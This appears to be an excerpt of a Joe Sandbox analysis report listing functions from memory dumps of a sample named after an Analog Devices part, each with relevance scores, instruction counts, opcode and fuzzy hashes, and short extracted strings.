Function 0B248840 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1eeedee3be7b0d9a8bfd7f9b68e469d6ad6e278f1f0a21d1d95784e040f4a7
Instruction ID: a31fc2d4406283f4f08506803c03618c23fa08976ff7e371b2825486e31042c0
Opcode Fuzzy Hash: 1c1eeedee3be7b0d9a8bfd7f9b68e469d6ad6e278f1f0a21d1d95784e040f4a7
Instruction Fuzzy Hash: 91F03074D252489FCB64EFBCC444A9CBBF4EB05314F0085EAE854AB3A2E736A941CF41

Function 051FAC9F Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf05b503a0c9fa7623e78d0dce852a3b740ab41b6c6cdc4a0cc6544e59b3dac9
Instruction ID: 1a44492e20b19dca25505b34a5359c61167a73e2638f0cda5fb1634474532994
Opcode Fuzzy Hash: cf05b503a0c9fa7623e78d0dce852a3b740ab41b6c6cdc4a0cc6544e59b3dac9
Instruction Fuzzy Hash: 5CE0D8722087810BC716DAB9E8805CEF7D2EFC52107048D1FE5689B153CF7459458B81

Function 051FBF20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd587ae3ca6a9aa9ea80db8cafaf7762989c0a0be7351a1443c2d3359719c02
Instruction ID: 2c8f2fcf85166b5b31a32975f479e2ea97fe94fdfbe6a1be7c1df77e09196d2c
Opcode Fuzzy Hash: edd587ae3ca6a9aa9ea80db8cafaf7762989c0a0be7351a1443c2d3359719c02
Instruction Fuzzy Hash: F5E01AA611E3D05FC3035B64B8586D43FB49F97216B0E50EBD584CF1A3C728490BEBA2

Function 0B24FA38 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf924ef532ee6c3e505d6e4ce03b35571ba3fc23a67e11ad73d63e9da23ba75a
Instruction ID: bbf60e7dab75712031d80ec0d8771d046e083cbf48e8a7e31c58d3b4da23d28e
Opcode Fuzzy Hash: bf924ef532ee6c3e505d6e4ce03b35571ba3fc23a67e11ad73d63e9da23ba75a
Instruction Fuzzy Hash: 17F03974D0020CFFCB04EFA8D54469CBBF5EB88310F10C0AAA818A3350D6305A90DF41

Function 0B24E6E5 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef0aca279ccadc05a41b844de4bbaa893c9fccb99b64f789a8a5159bf5e6c91
Instruction ID: 19ae0ebcd31fa88e96e166498166a0c786f895c1215fd689475e142b270623de
Opcode Fuzzy Hash: 5ef0aca279ccadc05a41b844de4bbaa893c9fccb99b64f789a8a5159bf5e6c91
Instruction Fuzzy Hash: 21F01234918244DFD708DF59E19855EBBF9FB09311B05D055E85987371C730E981CF41

Function 0B242958 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e519cfad1c6f38e6a49a0535329db7ff7327362813338e1e7ea39c9520bbdaad
Instruction ID: 3f67429d41fc19b6d938424f7adad30c8b18de850f94188fdf4f78094d1d2438
Opcode Fuzzy Hash: e519cfad1c6f38e6a49a0535329db7ff7327362813338e1e7ea39c9520bbdaad
Instruction Fuzzy Hash: 79E0ED35501258DFC7109B64E8449947735FF49362F1502E6E92A972B2CB329E81DF51

Function 051FCBC4 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a8dd143fd67f09ececf360ea80df45a2c7f20001ee3e4cf9e96cf454db4421
Instruction ID: eab572e9c6321e446545d11ae7a821d321d9c11ab2b6bf32ee434a07677fe033
Opcode Fuzzy Hash: 71a8dd143fd67f09ececf360ea80df45a2c7f20001ee3e4cf9e96cf454db4421
Instruction Fuzzy Hash: C2F09278A5420A9FDB04DF94D990EAEB7B5BF88304F108555E915AB361C770AD40DFA0

Function 0B24C31F Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2b98d70fb488fec8e6d5ebeab71350996c6dc54e5397a8acc0befb6a536ab7
Instruction ID: c46042ae65938916971443d4e993bb3c16af42f467dedbfbe8d328ad9cbbc323
Opcode Fuzzy Hash: ee2b98d70fb488fec8e6d5ebeab71350996c6dc54e5397a8acc0befb6a536ab7
Instruction Fuzzy Hash: A8E04F3155A204DFC7145B58E8AC6E9B7B8FF46712B0044F2D52AAB572CB315940DF62

Function 0B24A3F0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b94cecc477ff4a72b839d41449946933d2972fbeb54c7fc973947ed869e7d55
Instruction ID: 4d3b7a15addd63ff61f150b9f825fbe13a25b88d56521bf5da926f26179c7ec6
Opcode Fuzzy Hash: 8b94cecc477ff4a72b839d41449946933d2972fbeb54c7fc973947ed869e7d55
Instruction Fuzzy Hash: 3FE0E5B0D01219EFCB44EFA8C9456AEBBF5FB08310F1089BAD814A3340D7719A91DF84

Function 0B24C8D7 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b3f25ea8a6cc4ce7118e21fc22ab4c1e0636a963b9c1ff838fa078d0a24d06
Instruction ID: 69180b809b85563bdd35bd0d4a6ca1425271a021b88fdef3751e557a48d72730
Opcode Fuzzy Hash: 04b3f25ea8a6cc4ce7118e21fc22ab4c1e0636a963b9c1ff838fa078d0a24d06
Instruction Fuzzy Hash: C1E06D78956258DFCB05CFA8D0986EE7FB9EF08201F141059E4159A252D7788441CF01

Function 0B248850 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6965d922daf272d972d47b493fed09da89e202c7e408f5a918ae34292f26c7a1
Instruction ID: 032bbbe2d89f1220f565736f83219b4420aef6dd9707da11c3dfe859b96782c5
Opcode Fuzzy Hash: 6965d922daf272d972d47b493fed09da89e202c7e408f5a918ae34292f26c7a1
Instruction Fuzzy Hash: CDE09A74D21208DFCB84DFA9D549A9CBBF4EB08610F0080E9D818D7351E7359950CF41

Function 0B242940 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975ae28eeb706c71fc3684a98627ff1861c42096d408ce89e8ae4f38a61dd98b
Instruction ID: ecdb16bde72923eee506ce175f383391a174525d640290992c3f02bcdc8452ea
Opcode Fuzzy Hash: 975ae28eeb706c71fc3684a98627ff1861c42096d408ce89e8ae4f38a61dd98b
Instruction Fuzzy Hash: 0EE0EC36601248DFC7159B65E9444947775FB85356B5000A9E51687261CB32DA50CF50

Function 051FAA18 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ef73818553f040920c2ad2296e55fe2703a9db437fec8af8ece6e15e7fb456
Instruction ID: 9147bf1f0eabc228a150baf979da963093de1bdfc2d651edf5fb4e8a33a69853
Opcode Fuzzy Hash: 14ef73818553f040920c2ad2296e55fe2703a9db437fec8af8ece6e15e7fb456
Instruction Fuzzy Hash: A5D05B3630E3846FD7429B609C00D853F249F16360F0091CBF6584E1B3C3358856C771

Function 0B248620 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f136b5adfba2cb0f15a17942a509590d5d1c9d340c157008784db4e6d337ce
Instruction ID: 9763ad0c99106e98f49bf9b62e90e80455719a3b303511c85d38a7d9ef48b98c
Opcode Fuzzy Hash: e5f136b5adfba2cb0f15a17942a509590d5d1c9d340c157008784db4e6d337ce
Instruction Fuzzy Hash: AFE0E270D11208AFCB84EFA8D54569CBBF4EB48200F0080AA8818A3280E7755A54CF81

Function 0B245F30 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56100527738f03893d77a4308fcaeee45528c70d2325db2630126eafa3e5d03e
Instruction ID: a2ef9b28359ed405e06314f2dec7d3d89c0a0599584dae81ac1ab7fe01980b80
Opcode Fuzzy Hash: 56100527738f03893d77a4308fcaeee45528c70d2325db2630126eafa3e5d03e
Instruction Fuzzy Hash: 43D0A97081220CDFCB04EBB8DA0A69DBBF4AB06200F1041A88948932A0EB315E50DB82

Function 0B24A6C4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1be612ea206a294b424a51964386fa9aec90424c88eff999308e477bd30cb6
Instruction ID: b901e10141f9860ab321ebc48695385f720b5de21181356d82e84a1f2d94cf71
Opcode Fuzzy Hash: 8c1be612ea206a294b424a51964386fa9aec90424c88eff999308e477bd30cb6
Instruction Fuzzy Hash: E2D05234A92108CFDB54CB04EC80BD8B7B8EB85320F0052E2E00CA3120DB301EC98F01

Function 0B24A430 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ed3ec5711f30a2c289e5fcfd94b47ef348f726f5ebecf4b858a3d873639073
Instruction ID: cc31db0f0dcb8e3059707732808922d2c856070b64b1c8c369c2a3e6658b31f5
Opcode Fuzzy Hash: 15ed3ec5711f30a2c289e5fcfd94b47ef348f726f5ebecf4b858a3d873639073
Instruction Fuzzy Hash: 7ED0A97004A2809FE70877BCE90D3653B6CEB0231AF02406EE169810B2EBA08080CE67

Function 051FDD58 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfde1f3825405c74a78e0441ba7f2a556095b28cdfa6abeb6d6f41576e8e1324
Instruction ID: c708aeb1cd25d8e84b4ff577bed8def4cd927d09b38732ba9553d2a7993a570d
Opcode Fuzzy Hash: cfde1f3825405c74a78e0441ba7f2a556095b28cdfa6abeb6d6f41576e8e1324
Instruction Fuzzy Hash: CBE0E2B9A8010ACFCB14CFA4E099AADBBB0AB08344F21805AD106A72A0CB345804CF50

Function 051FAA28 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 503f3d7f83ad871cf4857bf96d6ac6c35337c4e2c96cb6981db87a14d6ea34af
Instruction ID: 7c53f5da7952a58657783077eeda37ac3ebb2a5d1ccb74068427ec7205e268f1
Opcode Fuzzy Hash: 503f3d7f83ad871cf4857bf96d6ac6c35337c4e2c96cb6981db87a14d6ea34af
Instruction Fuzzy Hash: 4EC01236200208BFDA80AA98D800D567769AB08610F509100BA080A222C672E862DBA0

Function 0B24A440 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba338fae2ff1ecc1724fe840144847fffd44093be9411e09cde552219ca04107
Instruction ID: 7a4d0337bb5b467097b35ebf98ac614132c0ae3a58b89f07914bd60a3bed659b
Opcode Fuzzy Hash: ba338fae2ff1ecc1724fe840144847fffd44093be9411e09cde552219ca04107
Instruction Fuzzy Hash: 0FC08C300466448BCB087798F80C36876ACAB01326F014010E22C40460CB7080D0CE67

Function 051F8E78 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c82a17b164a90d306874b2e2187f60745b269c04dbbc141c22498109e6859d
Instruction ID: 202a28735c92e46bfb5d333af264510170b8f0958dc96b48527329e076809dda
Opcode Fuzzy Hash: a0c82a17b164a90d306874b2e2187f60745b269c04dbbc141c22498109e6859d
Instruction Fuzzy Hash: 41C02B933CC10069C100E21804C072D9E509B91700F80CC05EA8805183C5308C05A762

Function 0B245274 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3f98e33bcd8778bc00ee8a00eb7df583628d9a37e43bb9f4e7274713481128
Instruction ID: 92305523f4721c6097ea03794f08b927a4472c5749639ad7d1a1ea66e800d776
Opcode Fuzzy Hash: 0f3f98e33bcd8778bc00ee8a00eb7df583628d9a37e43bb9f4e7274713481128
Instruction Fuzzy Hash: AAB01275178600ABD40C66A449C2D3F6960EBB6B48B50DD0232E4548708B649D24E56F

Function 051FCE07 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d48f7bdf0b87de83a8b314a1d16d142fb08f640d2ad8927659b7df23ce08a3
Instruction ID: bfbaf01fa5519b2c6862407ab28079ed99139c80356b5722d8473a6fffc567c1
Opcode Fuzzy Hash: 53d48f7bdf0b87de83a8b314a1d16d142fb08f640d2ad8927659b7df23ce08a3
Instruction Fuzzy Hash: 7BB0122A34824069C240F2544400B45E7901BA4B01F04C44AE68C06243813189139B22

Function 0B2474DF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fc7029671771c201953f51e69a50035920e7573c661e7760075c46d5090b72
Instruction ID: 7f7f7b171b9c8e8ff09f234b73f83be9ef7ebd51f1e683795342c059ed87cac4
Opcode Fuzzy Hash: d7fc7029671771c201953f51e69a50035920e7573c661e7760075c46d5090b72
Instruction Fuzzy Hash: 759002662709415B714CA1A08843A195410D6F574835481121755A8544CA54D065807B

Non-executed Functions

Function 051F7680 Relevance: 5.6, Strings: 4, Instructions: 595COMMON

Download Yara Rule

Strings

(ofq, xrefs: 051F778D
4|kq, xrefs: 051F7AAB
4|kq, xrefs: 051F7A90
4'fq, xrefs: 051F7B8A

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: (ofq$4'fq$4|kq$4|kq
API String ID: 0-4160250236
Opcode ID: 9d39570ab4f2ea94fda7b0f5ace2e109228398e2a2c92c7572a35a79a1b6fc8b
Instruction ID: ffa072f91cdeeeb9c3cf0686e7f5f5fc92f3d40ef143489ed140524600556753
Opcode Fuzzy Hash: 9d39570ab4f2ea94fda7b0f5ace2e109228398e2a2c92c7572a35a79a1b6fc8b
Instruction Fuzzy Hash: 9622F531B042168FCB15DF68D89896E7BB2FF85310B1585A9D606DB3E2DB30EC42CB91

Function 0B246910 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

nay, xrefs: 0B246BEC
H4ux, xrefs: 0B2469DA
H4ux, xrefs: 0B2469E1
nay, xrefs: 0B246BF6

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: H4ux$H4ux$nay$nay
API String ID: 0-2454568754
Opcode ID: f8fae291abc18ed4d953db36443ee1bd80d77211c4b585ce45a22433404dc31b
Instruction ID: af8c607651ed6dc2632c805dd740b5401aab63e4ce9cc2ff47d13518b7824705
Opcode Fuzzy Hash: f8fae291abc18ed4d953db36443ee1bd80d77211c4b585ce45a22433404dc31b
Instruction Fuzzy Hash: B4D13DB0E15219CFDB19CFA9C980A9EFBB2FF89300F1091AAD419AB755D770A941CF50

Function 0B243968 Relevance: 5.2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

Strings

%O@8, xrefs: 0B243AC4
tQ=), xrefs: 0B243A05
%O@8, xrefs: 0B243AD2
tQ=), xrefs: 0B2439FE

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: %O@8$%O@8$tQ=)$tQ=)
API String ID: 0-749352435
Opcode ID: fae4676cbac1541b8a655c57cc2a989f8403a9620cc2655ef2b4287de54a5058
Instruction ID: 711e68c1d7e85e85cb906fd86afdf4907f22d238bc73a65721646aa4cc003e7a
Opcode Fuzzy Hash: fae4676cbac1541b8a655c57cc2a989f8403a9620cc2655ef2b4287de54a5058
Instruction Fuzzy Hash: 3D71DD74E15219DFCB48CFA9D58499EFBF1EF88210B14856AE429AB324D730AA41CF54

Function 0B244518 Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

18', xrefs: 0B244662
18', xrefs: 0B244654
aY, xrefs: 0B244702
aY, xrefs: 0B244709

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 18'$18'$aY$aY
API String ID: 0-3687307736
Opcode ID: 1d19b69248e8eb3456d046311acab26adf2e080fbf6d807e52a39ea414172720
Instruction ID: 750d33115e5c82b50ebe0fd3be27569d56e1010ceddb7d18643321a7bbd33adb
Opcode Fuzzy Hash: 1d19b69248e8eb3456d046311acab26adf2e080fbf6d807e52a39ea414172720
Instruction Fuzzy Hash: 3D7108B4D21209CFCB08DF99D581AAEFBB1FF89710F14851AD425AB704D734A982CF95

Function 0B245040 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

6yu[, xrefs: 0B245196
6yu[, xrefs: 0B24518F
,uRR, xrefs: 0B245118

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ,uRR$6yu[$6yu[
API String ID: 0-86511755
Opcode ID: ac2ed1611db9a1538e6337730314167d36d111d2119b637d7de8c9fc80f6ab73
Instruction ID: 82bb352b1234d43ac6b532c4b9d8758d49001b2b37b5679b398c587e08e0b3af
Opcode Fuzzy Hash: ac2ed1611db9a1538e6337730314167d36d111d2119b637d7de8c9fc80f6ab73
Instruction Fuzzy Hash: 0C4117B4E1520ADFCB08CFA9C5815AEFBF2BF88300F20D06AC419B7254D3349A418B94

Function 0B247F70 Relevance: 2.8, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

Zjsq, xrefs: 0B24801E
9u"K, xrefs: 0B24801B

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: 9u"K$Zjsq
API String ID: 0-1261923490
Opcode ID: 9249f8e6d7beb17c3583515594a9f07b26f436ddfca9c764b660e8cfe1aece46
Instruction ID: 25d468c6735f8b7533fbc115cfa3b8243f89deb5f400c04a21a3d752d66dcb89
Opcode Fuzzy Hash: 9249f8e6d7beb17c3583515594a9f07b26f436ddfca9c764b660e8cfe1aece46
Instruction Fuzzy Hash: 0AC1E570E25619DFCB18CFAAD5805AEFBF2BF89310F14E52AD415AB268D7349942CF10

Function 051F5A60 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

f@EN, xrefs: 051F5BB7
f@EN, xrefs: 051F5BD5

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: f@EN$f@EN
API String ID: 0-2238735523
Opcode ID: 329105f3640948e83b89cb3465a4a69715685ab41beca1776b5039eb728beff9
Instruction ID: 3c4b61350ecf96b9a5aebc7fbfb8e60513023263a5cd0a1ba79ee22ef52cf216
Opcode Fuzzy Hash: 329105f3640948e83b89cb3465a4a69715685ab41beca1776b5039eb728beff9
Instruction Fuzzy Hash: 12713570E05218DFCB18CFA9C9848DDBBF3AF89310F25946AE515BB254E7309942CF64

Function 01335160 Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

a=~`, xrefs: 0133536B
a=~`, xrefs: 01335372

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: a=~`$a=~`
API String ID: 0-1612462472
Opcode ID: bf8aa99ca371b6cd56a7743914444e9f24312b4628b02d1e6eb43b4ac3f4e37a
Instruction ID: 6f15f5fde37057e67b17b30bf0a054826de44bba1cc158ccd45914fc08b4d5e6
Opcode Fuzzy Hash: bf8aa99ca371b6cd56a7743914444e9f24312b4628b02d1e6eb43b4ac3f4e37a
Instruction Fuzzy Hash: D86118B0E152099FCB14CFA9D8815EEFBB6FF89304F149569D411A7354D3349A828F98

Function 051F5A98 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

f@EN, xrefs: 051F5BB7
f@EN, xrefs: 051F5BD5

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: f@EN$f@EN
API String ID: 0-2238735523
Opcode ID: d50a9849d793a3d62f14cbc7073609f367eeab4cc2016b54c31a602ca486714d
Instruction ID: da593ced4acb12fac448b939d33c91b0b6f225c6daa15913175013822d42cfbb
Opcode Fuzzy Hash: d50a9849d793a3d62f14cbc7073609f367eeab4cc2016b54c31a602ca486714d
Instruction Fuzzy Hash: CC511270E052189FCB18CFA9C9808DDBBF3BF89310F15942AE115BB264E7309942CF24

Function 0B241720 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

]]o, xrefs: 0B24176F

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ]]o
API String ID: 0-2636374853
Opcode ID: bc28437e9d53a8f8978c4b0e6b9a89b62741dc1221d10c7dbde185262855a200
Instruction ID: 057c17a4b57c61352488a9388ec367c76e529c9fae872bf5580545196937aeee
